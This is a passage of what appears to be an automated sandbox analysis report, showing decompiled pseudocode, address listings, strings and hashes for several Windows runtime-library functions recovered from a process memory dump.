																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x18f7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x18f7b84 = _t75;
						_t73 = E0181EB70(_t134, 0x18f7b60);
						if( *0x18f7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0181FF60( *0x18f7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0183fab0
0x0183fab2
0x0183fab3
0x0183fab4
0x0183fabc
0x0183fac0
0x0183fb14
0x0183fb17
0x0183fac2
0x0183fac8
0x0183facd
0x0183fad3
0x0183fad3
0x0183fadd
0x0183fb18
0x0183fb1b
0x0183fb1d
0x0183fb1e
0x0183fb1f
0x0183fb20
0x0183fb21
0x0183fb22
0x0183fb23
0x0183fb24
0x0183fb25
0x0183fb26
0x0183fb27
0x0183fb28
0x0183fb29
0x0183fb2a
0x0183fb2b
0x0183fb2c
0x0183fb2d
0x0183fb2e
0x0183fb2f
0x0183fb3a
0x0183fb3b
0x0183fb3e
0x0183fb41
0x0183fb44
0x0183fb47
0x0183fb4a
0x0183fb4d
0x0183fb53
0x0187bdcb
0x0187bdcb
0x0183fb59
0x0183fb5b
0x0183fb5b
0x0183fb5e
0x0187bdd5
0x0187bdd8
0x00000000
0x0187bdda
0x00000000
0x0187bdda
0x0183fb64
0x0183fb64
0x0183fb64
0x0183fb67
0x0183fb6e
0x0183fb70
0x0183fb72
0x00000000
0x0183fb78
0x0183fb7a
0x0183fb7a
0x0183fb7d
0x0183fb80
0x0187bddf
0x0187bde1
0x00000000
0x0187bde3
0x00000000
0x0187bde3
0x0183fb86
0x0183fb86
0x0183fb86
0x0183fb8b
0x0183fb90
0x0183fb92
0x0183fb94
0x0183fb9a
0x0183fb9b
0x0183fba1
0x0187bde8
0x0187bdeb
0x0187bded
0x0187beb5
0x0187beb5
0x0187bebb
0x0187bebd
0x0187bec3
0x0187bed2
0x0187bedd
0x0187bedd
0x0187beed
0x00000000
0x0187bdf3
0x0187bdfe
0x0187be06
0x0187be0b
0x0187be0d
0x0187be0f
0x0187be14
0x0187be19
0x0187be20
0x0187be25
0x0187be27
0x0187be35
0x0187be39
0x0187be46
0x0187be4f
0x0187be54
0x0187be56
0x0187bef8
0x0187bef8
0x00000000
0x0187be5c
0x0187be5c
0x0187be60
0x00000000
0x0187be66
0x0187be66
0x0187be7f
0x0187be84
0x0187be87
0x0187be89
0x0187be8b
0x0187be99
0x0187be9d
0x0187bea0
0x0187beac
0x0187beaf
0x0187beb1
0x0187beb3
0x0187beb3
0x00000000
0x0187bea2
0x0187bea2
0x00000000
0x0187bea2
0x0187be8d
0x0187be8d
0x0187be92
0x00000000
0x0187be92
0x0187be8b
0x0187be60
0x0187be3b
0x0187be3b
0x0187be3e
0x00000000
0x0187be40
0x0187be40
0x0187be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0187be44
0x0187be3e
0x0187be29
0x0187be29
0x00000000
0x0187be29
0x0187be27
0x00000000
0x0183fba7
0x0183fba7
0x0183fbab
0x0187bf02
0x0183fbb1
0x0183fbb1
0x0183fbb8
0x0183fbbd
0x0183fbbd
0x0183fbbf
0x0183fbbf
0x0183fbc5
0x0183fbcb
0x0183fbf8
0x0183fbf8
0x0183fbfa
0x00000000
0x0183fc00
0x0183fc00
0x0183fc03
0x00000000
0x0183fc09
0x0183fc09
0x0183fc0f
0x0183fc15
0x0183fc23
0x0183fc23
0x0183fc25
0x0183fc27
0x0183fc75
0x0183fc7c
0x0183fc84
0x00000000
0x0183fc29
0x0183fc29
0x0183fc2d
0x0183fc30
0x0187bf0f
0x00000000
0x0183fc36
0x0183fc38
0x0183fc3b
0x0183fc41
0x0187bf17
0x0187bf19
0x0187bf48
0x0187bf4b
0x00000000
0x0187bf1b
0x0187bf22
0x0187bf24
0x0187bf26
0x00000000
0x0187bf2c
0x0187bf37
0x0187bf39
0x0187bf3b
0x00000000
0x0187bf41
0x0187bf41
0x0187bf41
0x0187bf41
0x0187bf45
0x00000000
0x0187bf45
0x0187bf3b
0x0187bf26
0x00000000
0x0183fc47
0x0183fc47
0x0183fc49
0x0183fcb2
0x0183fcb4
0x0183fcb6
0x0183fcdc
0x0183fcdc
0x00000000
0x0183fcb8
0x0183fcc3
0x0183fcc5
0x0183fcc7
0x00000000
0x0183fcc9
0x0183fcc9
0x0183fccd
0x00000000
0x0183fccd
0x0183fcc7
0x00000000
0x0183fc4b
0x0183fc4b
0x0183fc4e
0x0183fc4e
0x0183fc51
0x0183fc51
0x0183fc54
0x0183fc5a
0x0183fc5c
0x0183fc5f
0x0183fc61
0x0183fc63
0x0183fc65
0x0183fc67
0x0183fc6e
0x0183fc72
0x0183fc72
0x0183fc72
0x0183fc72
0x0183fc67
0x0183fc61
0x00000000
0x0183fc5a
0x0183fc49
0x0183fc41
0x0183fc30
0x0183fc27
0x0183fc03
0x0183fbcd
0x0183fbd3
0x0183fbd9
0x0183fbdc
0x0183fbde
0x0183fc99
0x0183fc9b
0x0183fc9d
0x0183fcd5
0x0183fcd5
0x0183fc89
0x0183fc89
0x00000000
0x0183fc9f
0x0183fc9f
0x0183fca3
0x00000000
0x0183fca3
0x00000000
0x0183fbe4
0x0183fbe4
0x0183fbe4
0x0183fbe4
0x0183fbe9
0x0183fbf2
0x00000000
0x0183fbf2
0x0183fbde
0x0183fbcb
0x0183fbab
0x0183fc8b
0x0183fc8b
0x0183fc8c
0x0183fb80
0x0183fb72
0x0183fb5e
0x0183fc8d
0x0183fc91
0x0183fadf
0x0183fadf
0x0183fae1
0x0183fae4
0x0183fae7
0x0183faec
0x0183faf8
0x0183fb00
0x0183fb07
0x0183fb0f
0x0183fb0f
0x0183fb07
0x00000000
0x0183faf8
0x0183fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0187BE0F

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 304b1970b41df7bca802d78f653d247a1c545368a314a5b644e6273e2dc0823a
Instruction ID: 193d65bf147d4e0f6d00559a8fa06982de26d9864c317c1031d4f7e1da224950
Opcode Fuzzy Hash: 304b1970b41df7bca802d78f653d247a1c545368a314a5b644e6273e2dc0823a
Instruction Fuzzy Hash: 54A12572F006168FEB25CB6CC450B6AB7A5AF84714F08456DEA02CB381DB34DB02CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 01802D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01802D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x18f5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x18f7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E018497C0();
				}
				if( *0x18f79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18f79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01831624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01827D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0189FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01849520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0183E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0185DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x18f6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x18f6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01849980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01827D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01827D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01887016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0189FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x18f5350;
							if(_t109 != 0x18f5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0189FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01895720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01802d8a
0x01802d8a
0x01802d92
0x01802d96
0x01802d9e
0x01802da0
0x01802da3
0x01802da5
0x01802da8
0x01802dab
0x01802db2
0x0185f9aa
0x0185f9ab
0x0185f9ae
0x0185f9ae
0x01802db8
0x01802dc2
0x0185f9b9
0x0185f9be
0x0185f9bf
0x0185f9bf
0x01802dcf
0x0185f9c9
0x01802dd5
0x01802dd5
0x01802dd5
0x01802dde
0x01802de1
0x01802e70
0x01802e72
0x01802e72
0x01802de7
0x01802deb
0x01802e7c
0x01802e83
0x01802e85
0x01802e8b
0x01802e8d
0x01802e92
0x01802e92
0x01802e85
0x01802df1
0x01802df7
0x01802df9
0x01802df9
0x01802dfc
0x01802dff
0x01802e02
0x00000000
0x01802e05
0x01802e0c
0x0185f9d9
0x01802e12
0x01802e12
0x01802e12
0x01802e1a
0x0185f9e3
0x0185f9e9
0x0185f9f0
0x0185f9f6
0x0185f9f8
0x0185f9f8
0x0185f9f0
0x01802e23
0x0185fa02
0x0185fa03
0x0185fa05
0x0185fa06
0x00000000
0x01802e29
0x01802e29
0x01802e2e
0x01802e34
0x01802e3e
0x00000000
0x00000000
0x01802e44
0x01802e47
0x01802e4d
0x00000000
0x00000000
0x01802e4f
0x01802e54
0x00000000
0x00000000
0x01802e5a
0x01802e5f
0x01802e9a
0x01802ea4
0x01802ea5
0x01802ea8
0x01802eaf
0x01802eb2
0x01802eb5
0x0185fae9
0x0185faeb
0x0185faed
0x0185faef
0x0185faf7
0x0185faf8
0x0185fafd
0x0185faff
0x0185fb04
0x0185fb04
0x0185faff
0x01802ec0
0x01802ec4
0x01802ec6
0x01802ec8
0x0185fb14
0x0185fb18
0x0185fb1e
0x0185fb21
0x0185fb21
0x01802ece
0x01802ece
0x01802ece
0x01802ed7
0x01802e61
0x01802e63
0x0185fa6b
0x0185fa71
0x0185fa76
0x0185fa78
0x0185fa8a
0x0185fa7a
0x0185fa83
0x0185fa83
0x0185fa8f
0x0185fa91
0x0185fa97
0x0185fa9d
0x0185faa4
0x0185faaa
0x0185faaf
0x0185fab1
0x0185fac3
0x0185fab3
0x0185fabc
0x0185fabc
0x0185fac8
0x0185facb
0x0185fadf
0x0185fadf
0x0185facb
0x0185faa4
0x0185fa91
0x01802e6f
0x01802e6f
0x01802e5f
0x0185fa13
0x0185fa15
0x0185fa17
0x0185fa1f
0x0185fa21
0x0185fa22
0x0185fa25
0x0185fa28
0x0185fa2f
0x0185fa2f
0x0185fa2a
0x0185fa2a
0x0185fa2a
0x0185fa31
0x0185fa34
0x0185fa36
0x0185fa3c
0x0185fa3e
0x0185fa41
0x0185fa43
0x0185fa45
0x0185fa45
0x0185fa41
0x0185fa3c
0x0185fa4a
0x0185fa4f
0x0185fa51
0x0185fa53
0x0185fa56
0x0185fa5b
0x0185fa5e
0x00000000
0x0185fa5e
0x01802e23

Strings

RTL: Re-Waiting, xrefs: 0185FA4A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 22ab6da006eb80d7be6666730c1c21decbb972d259cb382a68969a485fa2309e
Instruction ID: bbb1842d6575e82e6adadf8c3039bf7f8e19926478e21ef62d660668e5d0b5a7
Opcode Fuzzy Hash: 22ab6da006eb80d7be6666730c1c21decbb972d259cb382a68969a485fa2309e
Instruction Fuzzy Hash: A1610431A0064D9FEB73DB6CC848B7E7BA6EB44718F140669EA11D72C2C7749F418792

Uniqueness

Uniqueness Score: -1.00%

Function 018D0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E018D0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E018CFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E018D1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01849730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E018CA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E018CA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x18f8b04 >> 0x14) + (_v44 -  *0x18f8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01827D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E018C138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01827D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E018BFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x18f8724 & 0x00000008) != 0) {
						E018C52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018D15B5(0x18f8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x018d0eb7
0x018d0eb9
0x018d0ec0
0x018d0ec2
0x018d0ecd
0x018d105b
0x018d105b
0x018d1061
0x018d1066
0x018d1066
0x018d106b
0x018d1073
0x018d1073
0x018d0ed3
0x018d0ed6
0x018d0edc
0x018d0ee0
0x018d0ee7
0x018d0ef0
0x018d0ef5
0x018d0efa
0x018d0efc
0x018d0efd
0x018d0f03
0x018d0f04
0x018d0f06
0x018d0f07
0x018d0f09
0x018d0f0e
0x018d0f14
0x018d0f23
0x018d0f2d
0x018d0f34
0x018d0f34
0x018d0f14
0x018d0f52
0x00000000
0x00000000
0x018d0f58
0x018d0f73
0x018d0f74
0x018d0f79
0x018d0f7d
0x018d0f80
0x018d0f86
0x018d0fab
0x018d0fb5
0x018d0fc6
0x018d0fd1
0x018d0fe3
0x018d0fd3
0x018d0fdc
0x018d0fdc
0x018d0feb
0x018d1009
0x018d1009
0x018d1015
0x018d1027
0x018d1017
0x018d1020
0x018d1020
0x018d102f
0x018d103c
0x018d103c
0x018d1048
0x018d1050
0x018d1050
0x018d1055
0x00000000
0x018d1055
0x018d0f88
0x018d0f9e
0x018d0fa2
0x018d0fa9
0x00000000
0x00000000
0x00000000
0x018d0fa9
0x00000000

Strings

`, xrefs: 018D0F16

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 8c3dfa78b396f0d6189318047ef68808af9401106bd35dbcf0b25af4e1f78462
Instruction ID: 2cdfaeed9c136d4458867ff2f2f0d17b9ee952289760c2bf16a5bda8be7bed5c
Opcode Fuzzy Hash: 8c3dfa78b396f0d6189318047ef68808af9401106bd35dbcf0b25af4e1f78462
Instruction Fuzzy Hash: 95519B713083829BE325DF28D884B1BBBE5EF84704F14096CFA96D7291D670EA05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0183F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0183F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01824120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01849830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01849990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E018495D0();
							goto L11;
						} else {
							_t109 = L01824620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0184F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E018495D0();
										L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0183f0d3
0x0183f0d9
0x0183f0e0
0x0183f0e7
0x0183f0f2
0x0183f0f4
0x0183f0f8
0x0183f100
0x0183f108
0x0183f10d
0x0183f115
0x0183f116
0x0183f11f
0x0183f123
0x0183f124
0x0183f12c
0x0183f130
0x0183f134
0x0183f13d
0x0183f144
0x0183f14b
0x0183f152
0x0187bab0
0x0187bab0
0x0183f158
0x0183f158
0x0183f15a
0x0183f160
0x0183f165
0x0183f166
0x0183f16f
0x0183f173
0x0187baa7
0x0187baa7
0x0187baab
0x00000000
0x0183f179
0x0183f18d
0x0183f191
0x0187baa2
0x00000000
0x0183f197
0x0183f19b
0x0183f1a2
0x0183f1a9
0x0183f1af
0x0183f1b2
0x0183f1b6
0x0183f1b9
0x0183f1c4
0x0183f1d8
0x0183f1df
0x0183f1e3
0x0183f1eb
0x0183f1ee
0x0183f1f4
0x0183f20f
0x0187bab7
0x0187babb
0x0187bacc
0x0187bad1
0x0183f215
0x0183f218
0x0183f226
0x0183f22b
0x00000000
0x0183f22b
0x0183f1f6
0x0183f1f6
0x0183f1f9
0x0183f1fb
0x0183f1fb
0x0183f1f4
0x0183f191
0x0183f173
0x0183f152
0x0183f203

Strings

@, xrefs: 0183F124

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: c5dc7d9ffb10be96e8c243c97e2718de3632256f33c72496eaab48a7e12d388c
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: B1517B715007159FC321DF19C840A6BBBE8FF98714F008A2AFA95C7690E774EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01883540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01883540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x18fd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01840BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01883706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0184FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01883540;
						E0184FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0185DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01890C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E018497C0();
					}
					return E0184B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01883971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01883884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0184FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01849650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01883787(_a4,  &_v352, _t80);
						}
					}
					L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E018495D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01883552
0x0188355a
0x0188355d
0x01883566
0x01883567
0x0188357e
0x0188358f
0x018835a1
0x018835a5
0x0188366b
0x0188366b
0x0188366d
0x01883672
0x01883679
0x01883685
0x0188368d
0x0188369d
0x018836a7
0x018836b8
0x018836c6
0x018836c7
0x018836dc
0x018836e1
0x018836e7
0x018836e9
0x018836e9
0x01883703
0x01883703
0x018835b5
0x018835c0
0x018835c4
0x00000000
0x00000000
0x018835ca
0x018835d7
0x018835e2
0x018835e6
0x018835e8
0x018835f5
0x018835fa
0x01883603
0x01883604
0x01883609
0x0188360a
0x01883612
0x01883613
0x0188361e
0x01883622
0x01883628
0x0188362f
0x0188362f
0x01883636
0x01883638
0x0188363b
0x01883642
0x01883642
0x01883636
0x01883657
0x01883657
0x0188365c
0x01883662
0x01883669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0188358F

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

